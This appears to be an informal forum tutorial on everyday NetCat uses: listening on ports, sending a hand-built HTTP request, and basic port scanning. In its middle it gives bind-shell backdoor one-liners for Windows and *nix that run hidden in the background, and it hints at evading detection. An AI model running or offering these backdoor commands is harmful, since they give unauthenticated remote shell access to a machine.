13337

This is kind of a simple tip, but it's a useful one. If you need to send data to a server to see how it reacts, or need to receive data from a server, rather than writing a script.. just use NetCat! There are versions of NetCat for Windows and if your *nix distribution doesn't come pre-installed with NetCat, just get rid of it now.

Basically, to receive data from the server, you just need to set it in listen mode. Do that like this:

nc -l -p 99

That will listen for one connection on port 99 and echo the information received to your terminal. What if you want more than one connection?

nc -L -p 99

The -L (instead of -l) will accept any number of connections, and will only stop listening when you kill it. If you need it in a file, just pipe the output somewhere

nc -L -p 99 > ~/log

The -v flag (verbosity) is also recommended. You can use it multiple times for more effect, I usually use 2 or 3. It will give you additional information instead of just the raw data.

nc -L -p 99 -vvv

Now, sending data back to the server. You probably knew all the stuff I already talked about, but this is yet another thing NetCat can do. I'm going to assume you're on Windows (this can be done with bash scripts in *nix just as easily), and I'm going to use a batch file to illustrate my point.
send.bat:

echo GET / HTTP/1.1
echo Host: google.com

Simple, right? This doesn't really do anything much, but it should get us some data from the server.

send.bat | nc -v google.com 80

Probably want to pipe it to a file, so you can add

send.bat | nc -v google.com 80 > outfile.html

if you want to.

You can also make a backdoor with netcat. Just do something like this:
Windows:

nc -L -e cmd.exe -p 80 -d

*nix:

nc -L -e /bin/sh -p 80 -d > /dev/null &

Each of these effectively sets up a backdoor that runs in the background. It is by no means undetectable, but you can use your imagination there and save yourself a lot of wasted effort by reinventing the wheel once again by coding yet another bindshell.

NetCat can also function as a (bad) portscanner. I definitley recommend [url=http://insecure.org/nmap/]NMAP[/url] over using NetCat, but you work with what you have. It does have a list of generic services, but they are nowhere near as extensive as those in the NMAP database. Once again, NMAP should come with any good *nix distribution, but if you have to download it, there are sources available there and probably on your distribution's package manager.

nc -z -vvv 127.0.0.1 1-80

Need to use UDP instead of TCP? No problem, just throw in the -u flag. How about telnet? The -t flag takes care of that too. The possibilities are seriously endless. And guess what, you just saved yourself a bunch of time by using NetCat instead of coding your own custom tool to do the same thing in whatever language you choose. See, I really am awesome.